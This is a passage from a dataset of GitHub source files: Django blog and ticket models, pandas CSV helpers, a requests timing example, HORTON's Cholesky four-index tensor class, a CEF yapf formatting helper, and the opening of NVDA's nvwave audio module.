1:\n return qs\n else:\n return None\n \n \n def get_by_slug(self,slug):\n qs=self.get_queryset().filter(active=True,slug=slug)\n if qs.count() == 1:\n return qs\n else:\n return None\n\n\n######blog image url maker\ndef get_filename_ext(filepath):\n base_name = os.path.basename(filepath)\n name, ext = os.path.splitext(base_name)\n return name, ext\n\n\ndef upload_image_path(instance, filename):\n new_name = random.randint(1, 27634723542)\n name, ext = get_filename_ext(filename)\n # final_name = f\"{new_name}{ext}\"\n final_name = f\"{instance.id}-{instance.title}{ext}\"\n return f\"blog/{final_name}\"\n\n\n\n\n##################################blog tag model###########################################3\nclass Tag(models.Model):\n 
title=models.CharField(max_length=150)\n slug=models.SlugField(blank=True)\n date=models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.title\n\n\n\n\n\ndef tag_save(sender, instance, *args, **kwargs):\n if not instance.slug:\n instance.slug = unique_slug_generator(instance)\n\npre_save.connect(tag_save,sender=Tag)\n\n################cat model#############################################\nclass Category(models.Model):\n title=models.CharField(max_length=150)\n slug=models.SlugField(blank=True)\n date=models.DateTimeField(auto_now_add=True)\n parent=models.ForeignKey('self',default=None,null=True,blank=True,on_delete=models.CASCADE,related_name='parents_cat')\n\n def __str__(self):\n return self.title\n\ndef category_save(sender, instance, *args, **kwargs):\n if not instance.slug:\n instance.slug = unique_slug_generator(instance)\n\npre_save.connect(category_save,sender=Category)\n\n\n\n\n#################################################################################\n########BLOG main model##########################################################################\n#################################################################################\nclass Blog(models.Model):\n title=models.CharField(max_length=150,unique=True)\n slug=models.SlugField(blank=True, unique=True)\n body=RichTextUploadingField(blank=True,null=True)\n image=models.ImageField(upload_to=upload_image_path, null=True, blank=True)\n active=models.BooleanField(default=False)\n publish_time = models.DateTimeField(default=timezone.now)\n created_time = models.DateTimeField(auto_now_add=True)\n updated_time = models.DateTimeField(auto_now=True)\n publisher = models.ForeignKey(User, default=1, on_delete=models.CASCADE)\n my_tags = models.ManyToManyField(Tag, blank=True)\n category = models.ManyToManyField(Category, blank=True)\n star=models.ManyToManyField(User,blank=True,related_name=\"like_star\")\n seen=models.IntegerField(blank=True,null=True,default=0)\n short_link=models.CharField(max_length=20,null=True,blank=True)\n\n\n\n objects=BlogManager()\n def __str__(self):\n return self.title\n\n\n def number_of_starts(self):\n return self.star.count()\n def thumbnail_tag(self):\n\n return format_html(\" \".format(self.image.url))\n\t\t\n\n def jcal_time(self):\n return jcal(self.publish_time)\n jcal_time.short_description = \"published time\"\n\n def long_link(self):\n return settings.MY_HOST+\"blog/\"+self.slug\n def short_link_def(self):\n return settings.MY_HOST+\"sl/show/\"+self.short_link\n\n####Blog slug creator###\ndef product_pre_save_receiver(sender, instance, *args, **kwargs):\n if not instance.slug:\n instance.slug = unique_slug_generator(instance)\n\n\npre_save.connect(product_pre_save_receiver, sender=Blog)\n\n\n\n\n#######################Comment sys#############################\n######################\n#####################\n\n####MAin comment##################\n\nclass CommentBlog(models.Model):\n sender=models.ForeignKey(User, on_delete=models.CASCADE, blank=True, null=True)\n text= models.TextField()\n posted_time = models.DateTimeField(auto_now_add=True, editable=False)\n blog= models.ForeignKey(Blog, on_delete=models.CASCADE,related_name='comments')\n active=models.BooleanField(default=False)\n like=models.ManyToManyField(User,blank=True,related_name=\"like_comment\")\n dislike=models.ManyToManyField(User,blank=True,related_name=\"dislike_comment\")\n\n \n def number_of_likes(self):\n return self.like.count()\n def number_of_dislikes(self):\n return self.dislike.count()\n 
########################################################################################\n\n\n ########################ticket sys ##################################\n #######################\n ####################\n\n \nclass templatedir(models.Model):\n token = models.CharField(unique=True,max_length=250)\n file = models.FileField(storage=templatefs)\n date=models.DateTimeField(auto_now_add=True)\n def __str__(self):\n return self.token\n class Meta:\n verbose_name = 'templatedir'\n verbose_name_plural = 'templatedirs'\n\n\nclass menu(models.Model):\n name = models.CharField(max_length = 150)\n link = models.CharField(max_length = 250,blank=True)\n file = models.ManyToManyField(templatedir,blank=True,related_name='file_template')\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'menu'\n verbose_name_plural = 'menus'\n\n\n\n\nclass chanel(models.Model):\n token = models.UUIDField(unique=True)\n createor = models.ManyToManyField(User,related_name=\"createor\")\n date = models.DateTimeField(auto_now_add=True)\n vazit = models.BooleanField(default=False)\n title = models.CharField(max_length=250,blank=True)\n\n def jcal_time(self):\n return jcal(self.date)\n class Meta:\n verbose_name = 'chanel'\n verbose_name_plural = 'chanels'\n\nclass ticket(models.Model):\n chanel = models.ForeignKey(chanel,on_delete=models.CASCADE)\n sender = models.CharField(max_length = 150)\n title = models.CharField(max_length = 250,blank=True,null=True)\n mozoee = models.CharField(max_length = 250,blank=True,null=True)\n des = models.TextField()\n date = models.DateTimeField(default=timezone.now,blank=True)\n def jcal_time(self):\n return jcal(self.date)\n class Meta:\n verbose_name = 'ticket'\n verbose_name_plural = 'tickets'\n\n\n\n\n#################blog short link #######################\n#################\nclass ShortUrls(models.Model):\n short=models.CharField(max_length = 20,unique=True)\n long=models.URLField(\"URL\",unique=True)\n \n\n ########short pre save blog\n\n \n \ndef sl_pre_save_receiver(sender, instance, *args, **kwargs):\n if not instance.short_link:\n instance.short_link = Shortner().issue_token()\n ShortUrls.objects.create(long=instance.long_link(),short=instance.short_link)\n\n\npre_save.connect(sl_pre_save_receiver, sender=Blog)","repo_name":"aliaqa256/django_rizo","sub_path":"root/cms/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"17257936207","text":"import logging\nfrom datetime import datetime\nfrom time import time\nimport pandas as pd\n\n\ndef loadDF(fileName):\n \"\"\"Load file and parse it to dataframe, converts date fields to datetime\n\n Arguments:\n file {str} -- file to load\n\n Returns:\n DataFrame -- parsed dataframe\n \"\"\"\n st = time()\n df = pd.read_csv(fileName, sep=';', na_values=['\\\\N', 'None'],\n encoding='utf-8', compression='gzip')\n for i in ['login_last_dt', 'log_dt']:\n if i in df.columns:\n df[i] = df[i].apply(lambda x: datetime.strptime(x, '%Y-%m-%d'))\n logging.debug('\\t\\tfile `%s` loaded in %0.2f sec', fileName, time()-st)\n return df\n\n\ndef saveDF(df, fileName):\n \"\"\"Save dataframe\n \"\"\"\n st = time()\n df.to_csv(fileName, sep=';', index=False, compression='gzip')\n logging.debug('\\t\\tfile `%s` saved in %0.2f sec', fileName, time()-st)\n return True\n","repo_name":"SergeAA/ml-prod","sub_path":"kurs/gamechurn/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"28723057836","text":"import time\n#from urllib import response\nimport requests\n\ndef read_example() -> None:\n response = requests.get('https://www.baidu.com/')\n print(response.status_code)\n\nsync_start = time.time()\n\nread_example()\nread_example()\n\nsync_end =time.time()\n\nprint(f'Running synchrously took {sync_end - sync_start:.4f} seconds.')","repo_name":"DRAGONINWAVE/Python_Concurrency_with_asyncio","sub_path":"Chapter1_Getting_to_know_asyncio/Synchronously_reading_status_codes.py","file_name":"Synchronously_reading_status_codes.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"11885226109","text":"import numpy as np\n\nfrom horton.utils import check_type, check_options, doc_inherit\nfrom horton.matrix.base import parse_four_index_transform_exps, FourIndex\nfrom horton.matrix.cext import slice_to_three_abbc_abc, \\\n slice_to_three_abcc_bac, slice_to_three_abcc_abc\nfrom horton.matrix.dense import DenseLinalgFactory, DenseExpansion, \\\n DenseTwoIndex, DenseThreeIndex, DenseFourIndex\n\n\n__all__ = [\n 'CholeskyFourIndex', 'CholeskyLinalgFactory',\n]\n\n\nclass CholeskyLinalgFactory(DenseLinalgFactory):\n @doc_inherit(DenseLinalgFactory)\n def create_four_index(self, nbasis=None, nvec=None, array=None, array2=None):\n nbasis = nbasis or self.default_nbasis\n return CholeskyFourIndex(nbasis, nvec, array, array2)\n\n @doc_inherit(DenseLinalgFactory)\n def _check_four_index_init_args(self, four_index, nbasis=None, nvec=None, array=None):\n nbasis = nbasis or self.default_nbasis\n four_index.__check_init_args__(nbasis, nvec)\n\n create_four_index.__check_init_args__ = _check_four_index_init_args\n\n\nclass CholeskyFourIndex(FourIndex):\n \"\"\"Cholesky symmetric four-dimensional matrix.\n \"\"\"\n\n #\n # Constructor and destructor\n #\n\n def __init__(self, nbasis, nvec=None, array=None, array2=None):\n \"\"\"\n **Arguments:**\n\n nbasis\n The number of basis functions.\n\n **Optional arguments:**\n\n nvec\n The number of (2-index) Cholesky vectors.\n\n array\n The array with Cholesky vectors, shape = (nvec, nbasis, nbasis).\n\n array2\n The second set of Cholesky vectors, if different from the first.\n\n Either nvec or array must be given (or both).\n \"\"\"\n def check_array(a, name):\n if a.ndim != 3:\n raise TypeError('Argument %s has %i dimensions, expecting 3.' % (name, a.ndim))\n if nvec is not None and nvec != a.shape[0]:\n raise TypeError('nvec does not match %s.shape[0].' % name)\n if not (nbasis == a.shape[1] and nbasis == a.shape[2]):\n raise TypeError('nbasis does not match %s.shape[1] or %s.shape[2].' 
% (name, name))\n\n        if array is None:\n            self._self_alloc = True\n            if nvec is None:\n                raise TypeError('Either nvec or array must be given (or both).')\n            if array2 is not None:\n                raise TypeError('Argument array2 only allowed when array is given.')\n            self._array = np.zeros([nvec, nbasis, nbasis])\n            self._array2 = self._array\n        else:\n            self._self_alloc = False\n            check_array(array, 'array')\n            self._array = array\n            if array2 is None:\n                self._array2 = self._array\n            else:\n                check_array(array2, 'array2')\n                self._array2 = array2\n\n    #\n    # Properties\n    #\n\n    def _get_shape(self):\n        '''The shape of the object'''\n        return (self._array.shape[1], self._array2.shape[1], self._array.shape[2], self._array2.shape[2])\n\n    shape = property(_get_shape)\n\n    #\n    # Methods from base class\n    #\n\n    def __check_init_args__(self, nbasis, nvec):\n        '''Is self compatible with the given constructor arguments?'''\n        assert self._array is not None\n        assert nbasis == self.nbasis\n        assert nvec == self.nvec\n\n    def __eq__(self, other):\n        '''Compare self with other'''\n        return isinstance(other, CholeskyFourIndex) and \\\n               other.nbasis == self.nbasis and \\\n               other.nvec == self.nvec and \\\n               other.is_decoupled == self.is_decoupled and \\\n               (other._array == self._array).all() and \\\n               (other._array2 == self._array2).all()\n\n    @classmethod\n    def from_hdf5(cls, grp):\n        '''Construct an instance from data previously stored in an h5py.Group.\n\n        **Arguments:**\n\n        grp\n            An h5py.Group object.\n        '''\n        nvec = grp['array'].shape[0]\n        nbasis = grp['array'].shape[1]\n        result = cls(nbasis, nvec)\n        grp['array'].read_direct(result._array)\n        if 'array2' in grp:\n            result.decouple_array2()\n            grp['array2'].read_direct(result._array2)\n        return result\n\n    def to_hdf5(self, grp):\n        '''Dump this object in an h5py.Group\n\n        **Arguments:**\n\n        grp\n            An h5py.Group object.\n        '''\n        grp.attrs['class'] = self.__class__.__name__\n        grp['array'] = self._array\n        # Only store the second set of Cholesky vectors when it is decoupled from the first.\n        if self._array2 is not self._array:\n            grp['array2'] = self._array2\n\n    def new(self):\n        '''Return a new four-index object with the same nbasis'''\n        return CholeskyFourIndex(self.nbasis, self.nvec)\n\n    def _check_new_init_args(self, other):\n        '''Check whether an already initialized object is compatible'''\n        other.__check_init_args__(self.nbasis, self.nvec)\n\n    new.__check_init_args__ = _check_new_init_args\n\n    def clear(self):\n        '''Reset all elements to zero.'''\n        self._array[:] = 0.0\n        if self._array is not self._array2:\n            self._array2[:] = 0.0\n\n    def copy(self):\n        '''Return a copy of the current four-index operator'''\n        result = CholeskyFourIndex(self.nbasis, self.nvec)\n        result.assign(self)\n        return result\n\n    def assign(self, other):\n        '''Assign with the contents of another object\n\n        **Arguments:**\n\n        other\n            Another CholeskyFourIndex object.\n        '''\n        check_type('other', other, CholeskyFourIndex)\n        self._array[:] = other._array\n        if other._array is other._array2:\n            self.reset_array2()\n        else:\n            self.decouple_array2()\n            self._array2[:] = other._array2\n\n    def randomize(self):\n        '''Fill with random normal data'''\n        self._array[:] = np.random.normal(0, 1, self._array.shape)\n        if self.is_decoupled:\n            self._array2[:] = np.random.normal(0, 1, self._array2.shape)\n\n    def permute_basis(self, permutation):\n        '''Reorder the coefficients for a given permutation of basis functions.\n        '''\n        # Easy enough but irrelevant\n        raise NotImplementedError\n\n    def change_basis_signs(self, signs):\n        '''Correct for different sign conventions of the basis functions.'''\n        # Easy enough but irrelevant\n        raise 
NotImplementedError\n\n def iadd(self, other, factor):\n '''This method is not supported due to the Cholesky decomposition.'''\n raise NotImplementedError\n\n def iscale(self, factor):\n '''In-place multiplication with a scalar\n\n **Arguments:**\n\n factor\n A scalar factor.\n '''\n self._array *= np.sqrt(factor)\n\n if self._array is not self._array2:\n #arrays have been transformed\n self._array2 *= np.sqrt(factor)\n\n def get_element(self, i, j, k, l):\n '''Return a matrix element'''\n return np.dot(self._array[:,i,k], self._array2[:,j,l])\n\n def set_element(self, i, j, k, l, value):\n '''This method is not supported due to the Cholesky decomposition.'''\n raise NotImplementedError\n\n #\n # Properties\n #\n\n def _get_nbasis(self):\n '''The number of basis functions'''\n return self._array.shape[1]\n\n nbasis = property(_get_nbasis)\n\n def _get_nvec(self):\n '''The number of Cholesky vectors'''\n return self._array.shape[0]\n\n nvec = property(_get_nvec)\n\n def _get_is_decoupled(self):\n return self._array is not self._array2\n\n is_decoupled = property(_get_is_decoupled)\n\n #\n # New methods for this implementation\n # TODO: consider adding these to base class\n #\n\n def decouple_array2(self):\n '''Allocates a second Cholesky vector if not done yet'''\n if self._array2 is self._array:\n self._array2 = self._array.copy()\n\n def reset_array2(self):\n \"\"\"Deallocates the second cholesky vector and sets it to match the first.\n \"\"\"\n if self._array2 is not self._array:\n self._array2 = self._array\n\n def get_dense(self):\n '''Return the DenseFourIndex equivalent. ONLY FOR TESTING. SUPER SLOW.\n '''\n result = DenseFourIndex(self.nbasis)\n np.einsum('kac,kbd->abcd', self._array, self._array2, out=result._array)\n return result\n\n def is_symmetric(self, symmetry=2, rtol=1e-5, atol=1e-8):\n '''Check the symmetry of the array.\n\n **Optional arguments:**\n\n symmetry\n The symmetry to check. See :ref:`dense_matrix_symmetry`\n for more details.\n\n rtol and atol\n relative and absolute tolerance. See to ``np.allclose``.\n '''\n if self.is_decoupled and symmetry in (2, 8):\n return False\n if symmetry in (4, 8):\n if not np.allclose(self._array, self._array.swapaxes(1,2), rtol, atol):\n return False\n if self.is_decoupled and not np.allclose(self._array2, self._array2.swapaxes(1,2), rtol, atol):\n return False\n return True\n\n def symmetrize(self, symmetry=8):\n check_options('symmetry', symmetry, 1, 2, 4, 8)\n if symmetry in (2, 8) and self.is_decoupled:\n # This is a different type of symmetrization than in the dense case!\n self._array[:] += self._array2\n self._array *= 0.5\n self.reset_array2()\n if symmetry in (4, 8):\n self._array[:] = self._array + self._array.transpose(0,2,1)\n if self.is_decoupled:\n self._array2[:] = self._array2 + self._array2.transpose(0,2,1)\n\n def itranspose(self):\n '''In-place transpose: ``0,1,2,3 -> 1,0,3,2``'''\n if self.is_decoupled:\n self._array, self._array2 = self._array2, self._array\n\n def sum(self):\n '''Return the sum of all elements. 
EXPENSIVE!'''\n return np.tensordot(self._array, self._array2,(0,0)).sum() #expensive!!\n\n def iadd_exchange(self):\n '''In-place addition of its own exchange contribution'''\n raise NotImplementedError\n\n def slice_to_two(self, subscripts, out=None, factor=1.0, clear=True):\n \"\"\"Returns a two-index contraction of the four-index object.\n\n **Arguments:**\n\n subscripts\n Any of ``aabb->ab``, ``abab->ab``, ``abba->ab``\n\n **Optional arguments:**\n\n out, factor, clear\n See :py:meth:`DenseLinalgFactory.einsum`\n \"\"\"\n # Error checking\n check_options('subscripts', subscripts, 'aabb->ab', 'abab->ab', 'abba->ab')\n # Handle output argument\n if out is None:\n out = DenseTwoIndex(self.nbasis)\n else:\n check_type('out', out, DenseTwoIndex)\n if clear:\n out.clear()\n # Actual computation\n if subscripts == 'aabb->ab':\n out._array[:] += factor*np.einsum('xab,xab->ab', self._array, self._array2)\n elif subscripts == 'abab->ab':\n out._array[:] += factor*np.einsum('xaa,xbb->ab', self._array, self._array2)\n elif subscripts == 'abba->ab':\n out._array[:] += factor*np.einsum('xab,xba->ab', self._array, self._array2)\n return out\n\n def slice_to_three(self, subscripts, out=None, factor=1.0, clear=True):\n \"\"\"Returns a three-index contraction of the four-index object.\n\n **Arguments:**\n\n subscripts\n Any of ``abcc->bac``, ``abcc->abc``, ``abcb->abc``, ``abbc->abc``\n\n **Optional arguments:**\n\n out, factor, clear\n See :py:meth:`DenseLinalgFactory.einsum`\n \"\"\"\n # Error checking\n check_options('subscripts', subscripts, 'abcc->bac', 'abcc->abc', 'abcb->abc', 'abbc->abc')\n if out is None:\n out = DenseThreeIndex(self.nbasis)\n else:\n check_type('out', out, DenseThreeIndex)\n if clear:\n out.clear()\n # Actual computation\n if subscripts == 'abbc->abc':\n slice_to_three_abbc_abc(self._array, self._array2, out._array, factor, clear)\n elif subscripts == 'abcc->bac':\n slice_to_three_abcc_bac(self._array, self._array2, out._array, factor, clear)\n elif subscripts == 'abcc->abc':\n slice_to_three_abcc_abc(self._array, self._array2, out._array, factor, clear)\n elif subscripts == 'abcb->abc':\n L_r = np.diagonal(self._array2, axis1=1, axis2=2)\n out._array[:] += factor*np.tensordot(self._array, L_r, [(0,),(0,)]).swapaxes(1,2)\n return out\n\n def contract_two_to_four(self, subscripts, two, out=None, factor=1.0, clear=True):\n '''Contracts with a two-index object to obtain a four-index object.\n\n **Arguments:**\n\n subscripts\n Any of ``abcd,cd->acbd``, ``abcd,cd->acdb``, ``abcd,cb->acdb``,\n ``abcd,cb->acbd``, ``abcd,ab->acbd``, ``abcd,ab->acdb``,\n ``abcd,ad->acbd``, ``abcd,ad->acdb``, ``abcd,ad->abcd``,\n ``abcd,ad->abdc``, ``abcd,bd->abcd``, ``abcd,bd->abdc``,\n ``abcd,bc->abdc``, ``abcd,bc->abcd``, ``abcd,ac->abcd``,\n ``abcd,ac->abdc``\n\n two\n An instance of DenseTwoIndex.\n\n **Optional arguments:**\n\n out, factor, clear\n See :py:meth:`DenseLinalgFactory.einsum`\n '''\n check_options('subscripts', subscripts, 'abcd,cd->acbd',\n 'abcd,cd->acdb', 'abcd,cb->acdb', 'abcd,cb->acbd', 'abcd,ab->acbd',\n 'abcd,ab->acdb', 'abcd,ad->acbd', 'abcd,ad->acdb', 'abcd,ad->abcd',\n 'abcd,ad->abdc', 'abcd,bd->abcd', 'abcd,bd->abdc', 'abcd,bc->abdc',\n 'abcd,bc->abcd', 'abcd,ac->abcd', 'abcd,ac->abdc')\n raise NotImplementedError\n\n def contract_two_to_two(self, subscripts, two, out=None, factor=1.0, clear=True):\n \"\"\"Contract self with a two-index to obtain a two-index.\n\n **Arguments:**\n\n subscripts\n Any of ``abcd,bd->ac`` (direct), ``abcd,cb->ad`` (exchange)\n\n two\n The input 
two-index object. (DenseTwoIndex)\n\n **Optional arguments:**\n\n out, factor, clear\n See :py:meth:`DenseLinalgFactory.einsum`\n \"\"\"\n check_options('subscripts', subscripts, 'abcd,bd->ac', 'abcd,cb->ad')\n if out is None:\n out = DenseTwoIndex(self.nbasis)\n if clear:\n out.clear()\n else:\n check_type('out', out, DenseTwoIndex)\n if subscripts == 'abcd,bd->ac':\n tmp = np.tensordot(self._array2, two._array, axes=([(1,2),(1,0)]))\n out._array[:] += factor*np.tensordot(self._array, tmp, [0,0])\n elif subscripts == 'abcd,cb->ad':\n tmp = np.tensordot(self._array2, two._array, axes=([1,1]))\n out._array[:] += factor*np.tensordot(self._array, tmp, ([0,2],[0,2]))\n return out\n\n def assign_four_index_transform(self, ao_integrals, exp0, exp1=None, exp2=None, exp3=None, method='tensordot'):\n '''Perform four index transformation.\n\n **Arguments:**\n\n oa_integrals\n A CholeskyFourIndex with integrals in atomic orbitals.\n\n exp0\n A DenseExpansion object with molecular orbitals\n\n **Optional arguments:**\n\n exp1, exp2, exp3\n Can be provided to transform each index differently. See\n ``parse_four_index_transform_exps`` for details.\n\n method\n Either ``einsum`` or ``tensordot`` (default).\n '''\n check_type('ao_integrals', ao_integrals, CholeskyFourIndex)\n exp0, exp1, exp2, exp3 = parse_four_index_transform_exps(exp0, exp1, exp2, exp3, DenseExpansion)\n if method == 'einsum':\n if ao_integrals.is_decoupled or not (exp0 is exp1 and exp2 is exp3):\n self.decouple_array2()\n self._array2[:] = np.einsum('bi,kbd->kid', exp1.coeffs, ao_integrals._array2)\n self._array2[:] = np.einsum('dj,kid->kij', exp3.coeffs, self._array2)\n self._array[:] = np.einsum('ai,kac->kic', exp0.coeffs, ao_integrals._array)\n self._array[:] = np.einsum('cj,kic->kij', exp2.coeffs, self._array)\n elif method == 'tensordot':\n if ao_integrals.is_decoupled or not (exp0 is exp1 and exp2 is exp3):\n self.decouple_array2()\n self._array2[:] = np.tensordot(ao_integrals._array2, exp1.coeffs, axes=([1],[0]))\n self._array2[:] = np.tensordot(self._array2, exp3.coeffs, axes=([1],[0]))\n self._array[:] = np.tensordot(ao_integrals._array, exp0.coeffs, axes=([1],[0]))\n self._array[:] = np.tensordot(self._array, exp2.coeffs, axes=([1],[0]))\n else:\n raise ValueError('The method must either be \\'einsum\\' or \\'tensordot\\'.')\n","repo_name":"binghuang2018/horton","sub_path":"horton/horton/matrix/cholesky.py","file_name":"cholesky.py","file_ext":"py","file_size_in_byte":17045,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"2527176250","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom exec_util import exec_cmd\nimport os\nimport sys\n\n# Script directory.\nscript_dir = os.path.dirname(__file__)\nroot_dir = os.path.join(script_dir, os.pardir)\n\n\ndef yapf_format(file_name, file_contents):\n # Reads .style.yapf in the root_dir when specifying contents via stdin.\n result = exec_cmd(\"%s %s/yapf\" % (sys.executable, script_dir), root_dir,\n file_contents.encode('utf-8'))\n if result['err'] != '':\n print(\"yapf error: %s\" % result['err'])\n if result['out'] != '':\n output = result['out']\n if sys.platform == 'win32':\n # Convert to Unix line endings.\n output = output.replace(\"\\r\", \"\")\n return output\n return None\n","repo_name":"chromiumembedded/cef","sub_path":"tools/yapf_util.py","file_name":"yapf_util.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":2662,"dataset":"github-code","pt":"70"}
+{"seq_id":"29674045548","text":"#nvwave.py\r\n#A part of NonVisual Desktop Access (NVDA)\r\n#Copyright (C) 2007-2017 NV Access Limited, Aleksey Sadovoy\r\n#This file is covered by the GNU General Public License.\r\n#See the file COPYING for more details.\r\n\r\n\"\"\"Provides a simple Python interface to playing audio using the Windows multimedia waveOut functions, as well as other useful utilities.\r\n\"\"\"\r\n\r\nimport threading\r\nimport typing\r\nfrom ctypes import (\r\n\twindll,\r\n\tPOINTER,\r\n\tStructure,\r\n\tc_uint,\r\n\tcreate_unicode_buffer,\r\n\tsizeof,\r\n\tbyref,\r\n)\r\nfrom ctypes.wintypes import (\r\n\tHANDLE,\r\n\tWORD,\r\n\tDWORD,\r\n\tLPSTR,\r\n\tWCHAR,\r\n\tUINT,\r\n\tLPUINT\r\n)\r\nfrom ctypes import *\r\nfrom ctypes.wintypes import *\r\nimport time\r\nimport atexit\r\nimport wx\r\nimport garbageHandler\r\nimport winKernel\r\nimport wave\r\nimport config\r\nfrom logHandler import log\r\nimport os.path\r\n\r\n__all__ = (\r\n\t\"WavePlayer\", \"getOutputDeviceNames\", \"outputDeviceIDToName\", \"outputDeviceNameToID\",\r\n)\r\n\r\nwinmm = windll.winmm\r\n\r\nHWAVEOUT = HANDLE\r\nLPHWAVEOUT = POINTER(HWAVEOUT)\r\n\r\nclass WAVEFORMATEX(Structure):\r\n\t_fields_ = [\r\n\t\t(\"wFormatTag\", WORD),\r\n\t\t(\"nChannels\", WORD),\r\n\t\t(\"nSamplesPerSec\", DWORD),\r\n\t\t(\"nAvgBytesPerSec\", DWORD),\r\n\t\t(\"nBlockAlign\", WORD),\r\n\t\t(\"wBitsPerSample\", WORD),\r\n\t\t(\"cbSize\", WORD)\r\n\t]\r\nLPWAVEFORMATEX = POINTER(WAVEFORMATEX)\r\n\r\nclass WAVEHDR(Structure):\r\n\tpass\r\nLPWAVEHDR = POINTER(WAVEHDR)\r\nWAVEHDR._fields_ = [\r\n\t(\"lpData\", LPSTR),\r\n\t(\"dwBufferLength\", DWORD),\r\n\t(\"dwBytesRecorded\", DWORD),\r\n\t(\"dwUser\", DWORD),\r\n\t(\"dwFlags\", DWORD),\r\n\t(\"dwLoops\", DWORD),\r\n\t(\"lpNext\", LPWAVEHDR),\r\n\t(\"reserved\", DWORD)\r\n]\r\nWHDR_DONE = 1\r\n\r\nWAVE_FORMAT_PCM = 1\r\nWAVE_MAPPER = -1\r\nMMSYSERR_NOERROR = 0\r\n\r\nCALLBACK_NULL = 0\r\n#CALLBACK_FUNCTION = 0x30000\r\nCALLBACK_EVENT = 0x50000\r\n#waveOutProc = CFUNCTYPE(HANDLE, UINT, DWORD, DWORD, DWORD)\r\n#WOM_DONE = 0x3bd\r\n\r\nMAXPNAMELEN = 32\r\nclass WAVEOUTCAPS(Structure):\r\n\t_fields_ = [\r\n\t\t('wMid', WORD),\r\n\t\t('wPid', WORD),\r\n\t\t('vDriverVersion', c_uint),\r\n\t\t('szPname', WCHAR*MAXPNAMELEN),\r\n\t\t('dwFormats', DWORD),\r\n\t\t('wChannels', WORD),\r\n\t\t('wReserved1', WORD),\r\n\t\t('dwSupport', DWORD),\r\n\t]\r\n\r\n\r\n# Set argument types.\r\nwinmm.waveOutOpen.argtypes = (LPHWAVEOUT, UINT, LPWAVEFORMATEX, DWORD, DWORD, DWORD)\r\nwinmm.waveOutGetID.argtypes = (HWAVEOUT, LPUINT)\r\n\r\n\r\n# Initialize error checking.\r\ndef _winmm_errcheck(res, func, args):\r\n\tif res != MMSYSERR_NOERROR:\r\n\t\tbuf = create_unicode_buffer(256)\r\n\t\twinmm.waveOutGetErrorTextW(res, buf, sizeof(buf))\r\n\t\traise WindowsError(res, buf.value)\r\nfor func in (\r\n\twinmm.waveOutOpen, winmm.waveOutPrepareHeader, winmm.waveOutWrite, winmm.waveOutUnprepareHeader,\r\n\twinmm.waveOutPause, winmm.waveOutRestart, winmm.waveOutReset, winmm.waveOutClose,\r\n\twinmm.waveOutGetDevCapsW,\r\n\twinmm.waveOutGetID,\r\n):\r\n\tfunc.errcheck = _winmm_errcheck\r\n\r\n\r\ndef _isDebugForNvWave():\r\n\treturn config.conf[\"debugLog\"][\"nvwave\"]\r\n\r\nclass WavePlayer(garbageHandler.TrackedObject):\r\n\t\"\"\"Synchronously play a stream of audio.\r\n\tTo use, construct an instance and feed it waveform audio using L{feed}.\r\n\tKeeps device open until it is either not available, or WavePlayer is explicitly closed / deleted.\r\n\tWill attempt to use the preferred device, if not will 
fallback to the WAVE_MAPPER device.\r\n\tWhen not using the preferred device, when idle devices will be checked to see if the preferred\r\n\tdevice has become available again. If so, it will be re-instated.\r\n\t\"\"\"\r\n\t#: Minimum length of buffer (in ms) before audio is played.\r\n\tMIN_BUFFER_MS = 300\r\n\t#: Flag used to signal that L{stop} has been called.\r\n\tSTOPPING = \"stopping\"\r\n\t#: A lock to prevent WaveOut* functions from being called simultaneously,\r\n\t# as this can cause problems even if they are for different HWAVEOUTs.\r\n\t_global_waveout_lock = threading.RLock()\r\n\t_audioDucker=None\r\n\t#: Used to allow the device to temporarily be changed and return\r\n\t# to the preferred device when it becomes available\r\n\t_preferredDeviceName: str\r\n\t#: The currently set device name.\r\n\t_outputDeviceName: str\r\n\t#: The id of the device when it was opened.\r\n\t# It is set to None when the device is closed again.\r\n\t_outputDeviceID: int\r\n\t#: Use the default device, this is the configSpec default value.\r\n\tDEFAULT_DEVICE_KEY = \"default\"\r\n\r\n\tdef __init__(\r\n\t\t\tself,\r\n\t\t\tchannels: int,\r\n\t\t\tsamplesPerSec: int,\r\n\t\t\tbitsPerSample: int,\r\n\t\t\toutputDevice: typing.Union[str, int] = WAVE_MAPPER,\r\n\t\t\tcloseWhenIdle: bool = False,\r\n\t\t\twantDucking: bool = True,\r\n\t\t\tbuffered: bool = False\r\n\t\t):\r\n\t\t\"\"\"Constructor.\r\n\t\t@param channels: The number of channels of audio; e.g. 2 for stereo, 1 for mono.\r\n\t\t@param samplesPerSec: Samples per second (hz).\r\n\t\t@param bitsPerSample: The number of bits per sample.\r\n\t\t@param outputDevice: The device ID or name of the audio output device to use.\r\n\t\t@param closeWhenIdle: If C{True}, close the output device when no audio is being played.\r\n\t\t@param wantDucking: if true then background audio will be ducked on Windows 8 and higher\r\n\t\t@param buffered: Whether to buffer small chunks of audio to prevent audio glitches.\r\n\t\t@note: If C{outputDevice} is a name and no such device exists, the default device will be used.\r\n\t\t@raise WindowsError: If there was an error opening the audio output device.\r\n\t\t\"\"\"\r\n\t\tself.channels=channels\r\n\t\tself.samplesPerSec=samplesPerSec\r\n\t\tself.bitsPerSample=bitsPerSample\r\n\r\n\t\tself._setCurrentDevice(preferredDevice=outputDevice)\r\n\t\tself._preferredDeviceName = self._outputDeviceName\r\n\r\n\t\tif wantDucking:\r\n\t\t\timport audioDucking\r\n\t\t\tif audioDucking.isAudioDuckingSupported():\r\n\t\t\t\tself._audioDucker=audioDucking.AudioDucker()\r\n\t\t#: If C{True}, close the output device when no audio is being played.\r\n\t\t#: @type: bool\r\n\t\tself.closeWhenIdle = closeWhenIdle\r\n\t\tif buffered:\r\n\t\t\t#: Minimum size of the buffer before audio is played.\r\n\t\t\t#: However, this is ignored if an C{onDone} callback is provided to 